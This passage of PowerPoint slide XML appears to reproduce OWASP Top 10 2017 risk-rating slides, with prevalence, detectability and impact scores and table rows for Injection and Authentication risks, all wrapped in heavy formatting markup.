                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EASY: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" kern="1200">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MODERATE: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1"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en-US" sz="1000" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1"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590805">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3</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latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a: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900"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Average</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050" b="1" kern="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="00B050"/>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1800" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>= </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2400" b="1" kern="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3.0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latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>3</a:t>
                      </a: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0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="20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latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>*</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rgbClr val="000000"/>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0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="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latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>2</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
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3744035" y="8160785"/>
            <a:ext cx="1028819" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= 6.0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Textplatzhalter 3"/>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+R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Note About Risks</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Gruppieren 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="129415" y="5910536"/>
            <a:ext cx="5897010" cy="390006"/>
            <a:chOff x="-29610" y="1058047"/>
            <a:chExt cx="5897010" cy="390006"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="31" name="Group 40"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-29610" y="1058047"/>
              <a:ext cx="5897010" cy="386519"/>
              <a:chOff x="-29610" y="1070390"/>
              <a:chExt cx="5897010" cy="386519"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5257800" y="1070390"/>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grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="36" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="493228" y="1105372"/>
                <a:ext cx="139699" cy="305288"/>
                <a:chOff x="131" y="1565"/>
                <a:chExt cx="288" cy="625"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="42"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43"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4"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5"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6"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37" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="-29610" y="1073624"/>
                <a:ext cx="575799" cy="297517"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>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38" name="AutoShape 163"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1189590"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Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>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Vectors</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39"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Security</a:t>
                </a:r>
                <a:b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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="40" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="38" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2027790" y="1257554"/>
                <a:ext cx="838200" cy="4864"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector2">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="38100">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:prstDash val="sysDot"/>
                <a:miter lim="800000"/>
                <a:headEnd type="oval" w="sm" len="sm"/>
                <a:tailEnd type="oval" w="sm" len="sm"/>
              </a:ln>
            </p:spPr>
          </p:cxnSp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="41" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:endCxn id="38" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="732390" y="1256471"/>
                <a:ext cx="457200" cy="1083"/>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2" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1067053"/>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33" name="Rectangle 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1211643"/>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4" name="AutoShape 140"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:stCxn id="39" idx="3"/>
              <a:endCxn id="35" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3899845" y="1251307"/>
              <a:ext cx="1357955" cy="727"/>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2" name="Right Brace 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2738468" y="6443548"/>
            <a:ext cx="292533" cy="2241840"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 89876"/>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dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Brace 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4216588" y="7238182"/>
            <a:ext cx="270030" cy="1665187"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 89876"/>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dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1265545612"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="128683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4800">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Top 10 Risk Factor Summary</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2"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951550">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en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The following table presents a summary of the 2017 Top 10 Application Security Risks, and the risk factors we have assigned to each risk. These factors were determined based on the available</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> statistics and the experience of the OWASP Top 10 team</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" u="sng" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>you must consider your own specific threat agents and business impacts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. Even severe software weaknesses may not present a serious risk if there are no threat agents in a position to perform the necessary attack or the business impact is negligible for the assets involved</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="900" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>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68" name="Table 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2559885975"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="2209800"/>
          <a:ext cx="6842248" cy="4223373"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1217284">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="504000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1106043">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1032307">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="504000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20006"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="414000">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20007"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="618423">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RISK</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b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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b="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b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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b="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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sz="950" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Score</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362958">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A1:2017-</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Injection</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EASY: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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1" baseline="0"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EASY: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SEVERE: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90000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>8.0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1"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="362958">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A2:2017-Authentication</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EASY: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baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>COMMON: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>2</a:t>
                      </a:r>
